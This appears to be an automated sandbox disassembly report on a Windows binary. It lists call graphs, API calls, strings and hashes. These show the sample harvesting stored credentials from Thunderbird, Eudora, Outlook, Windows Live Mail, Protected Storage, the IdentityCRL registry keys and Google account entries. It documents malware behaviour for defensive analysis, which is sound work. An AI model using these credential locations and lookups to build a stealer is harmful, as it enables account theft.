33798 44b364 ??3@YAXPAX 33797->33798 33799 44b36b 33797->33799 33798->33799 33800 44b374 ??3@YAXPAX 33799->33800 33801 44b37b 33799->33801 33800->33801 33925 426741 21 API calls 33926 40c5c3 125 API calls 33928 43fdc5 17 API calls 34114 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 33931 4161cb memcpy memcpy memcpy memcpy 34119 43ffc8 18 API calls 34121 4383cc 110 API calls __fprintf_l 33933 4275d3 41 API calls 34122 4153d3 22 API calls __fprintf_l 33934 444dd7 _XcptFilter 34127 4013de 15 API calls 34129 425115 111 API calls __fprintf_l 34130 43f7db 18 API calls 34133 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 33937 4335ee 16 API calls __fprintf_l 34135 429fef 11 API calls 33938 444deb _exit _c_exit 34136 40bbf0 138 API calls 33941 425115 79 API calls __fprintf_l 34140 437ffa 22 API calls 33945 4021ff 14 API calls 33946 43f5fc 149 API calls 34141 40e381 9 API calls 33948 405983 40 API calls 33949 42b186 27 API calls __fprintf_l 33950 427d86 76 API calls 33951 403585 20 API calls 33953 42e58e 18 API calls __fprintf_l 33956 425115 75 API calls __fprintf_l 33958 401592 8 API calls 32893 410b92 32896 410a6b 32893->32896 32895 410bb2 32897 410a77 32896->32897 32898 410a89 GetPrivateProfileIntA 32896->32898 32901 410983 memset _itoa WritePrivateProfileStringA 32897->32901 32898->32895 32900 410a84 32900->32895 32901->32900 34145 434395 16 API calls 33960 441d9c memcmp 34147 43f79b 119 API calls 33961 40c599 43 API calls 34148 426741 87 API calls 33965 4401a6 21 API calls 33967 426da6 memcpy memset memset memcpy 33968 4335a5 15 API calls 33970 4299ab memset memset memcpy memset memset 33971 40b1ab 8 API calls 34153 425115 76 API calls __fprintf_l 34157 4113b2 18 API calls 2 library calls 34161 40a3b8 memset sprintf SendMessageA 32907 410bbc 32910 4109cf 32907->32910 32911 4109dc 32910->32911 32912 410a23 memset GetPrivateProfileStringA 32911->32912 32913 4109ea memset 32911->32913 32918 407646 strlen 32912->32918 32923 4075cd sprintf memcpy 32913->32923 32916 410a0c WritePrivateProfileStringA 32917 410a65 32916->32917 32919 40765a 32918->32919 32921 40765c 32918->32921 32919->32917 32920 4076a3 32920->32917 32921->32920 32924 40737c strtoul 32921->32924 32923->32916 32924->32921 33973 40b5bf memset memset _mbsicmp

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00401E8B
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00401EA4
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00401EB2
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00401EF8
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00401F06
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00401FB1
                                                                                                                                                                                                                              • atoi.MSVCRT(?), ref: 00401FE0
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00402003
                                                                                                                                                                                                                              • sprintf.MSVCRT ref: 00402030
                                                                                                                                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00402086
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040209B
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 004020A1
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 004020AF
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 004020E2
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 004020F0
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00402018
                                                                                                                                                                                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                                                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                                                                                              • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                                                                                                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                                              • API String ID: 1846531875-4223776976
                                                                                                                                                                                                                              • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                                                                                                                                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408343
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00408376
                                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                                                              • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                                                              • API String ID: 1832431107-3760989150
                                                                                                                                                                                                                              • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                                                                                              • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                              • API String ID: 1197458902-317895162
                                                                                                                                                                                                                              • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                                                                                                                                              • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 231 40fb00-40fb35 call 44b090 RegOpenKeyExA 234 40fc37-40fc3d 231->234 235 40fb3b-40fb4f RegOpenKeyExA 231->235 236 40fb55-40fb7e RegQueryValueExA 235->236 237 40fc2d-40fc31 RegCloseKey 235->237 238 40fc23-40fc27 RegCloseKey 236->238 239 40fb84-40fb93 call 404734 236->239 237->234 238->237 239->238 242 40fb99-40fbd1 call 4047a5 239->242 242->238 245 40fbd3-40fbdb 242->245 246 40fc19-40fc1d LocalFree 245->246 247 40fbdd-40fc14 memcpy * 2 call 40f802 245->247 246->238 247->246
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,00456E58,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                                                              • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                                                                • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                                                                • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                                • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                                • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                                              • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                                                                                                                                                                                                                              • API String ID: 2768085393-2409096184
                                                                                                                                                                                                                              • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                                                              • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 249 444c4a-444c66 call 444e38 GetModuleHandleA 252 444c87-444c8a 249->252 253 444c68-444c73 249->253 255 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 252->255 253->252 254 444c75-444c7e 253->254 256 444c80-444c85 254->256 257 444c9f-444ca3 254->257 264 444d02-444d0d __setusermatherr 255->264 265 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 255->265 256->252 259 444c8c-444c93 256->259 257->252 260 444ca5-444ca7 257->260 259->252 262 444c95-444c9d 259->262 263 444cad-444cb0 260->263 262->263 263->255 264->265 268 444da4-444da7 265->268 269 444d6a-444d72 265->269 272 444d81-444d85 268->272 273 444da9-444dad 268->273 270 444d74-444d76 269->270 271 444d78-444d7b 269->271 270->269 270->271 271->272 274 444d7d-444d7e 271->274 275 444d87-444d89 272->275 276 444d8b-444d9c GetStartupInfoA 272->276 273->268 274->272 275->274 275->276 277 444d9e-444da2 276->277 278 444daf-444db1 276->278 279 444db2-444dc6 GetModuleHandleA call 40cf44 277->279 278->279 282 444dcf-444e0f _cexit call 444e71 279->282 283 444dc8-444dc9 exit 279->283 283->282
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3662548030-0
                                                                                                                                                                                                                              • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                                                                                                                                              • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                                • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00444379
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00444394
                                                                                                                                                                                                                                • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                                                              • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                                                              • Store Root, xrefs: 004443A5
                                                                                                                                                                                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                                              • API String ID: 832325562-2578778931
                                                                                                                                                                                                                              • Opcode ID: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                                                                                                                                                                                              • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f165504987e9a82ab8efa023aeec732962b03d7066b9d51c5ac3c2af033d9fa7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 323 40f67f-40f6bf call 4012ee RegQueryValueExA 321->323 323->315 328 40f6c1-40f6cf 323->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                                                                • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                                                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                              • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2012582556-3916222277
                                                                                                                                                                                                                              • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                                                              • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                                                              • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                                                                • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                                • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                                                                                                                                              • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                                                              • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                                                              • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                              • String ID: %s@yahoo.com
                                                                                                                                                                                                                              • API String ID: 317221925-3288273942
                                                                                                                                                                                                                              • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                                                              • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 354 404a99-404ac2 LoadLibraryA 355 404ac4-404ad2 GetProcAddress 354->355 356 404aec-404af4 354->356 357 404ad4-404ad8 355->357 358 404add-404ae6 FreeLibrary 355->358 362 404af5-404afa 356->362 361 404adb 357->361 358->356 359 404ae8-404aea 358->359 359->362 361->358 363 404b13-404b17 362->363 364 404afc-404b12 MessageBoxA 362->364
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                                                              • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000010.00000002.1849959455.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_400000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                              • API String ID: 2780580303-317687271
                                                                                                                                                                                                                              • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                                                              • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
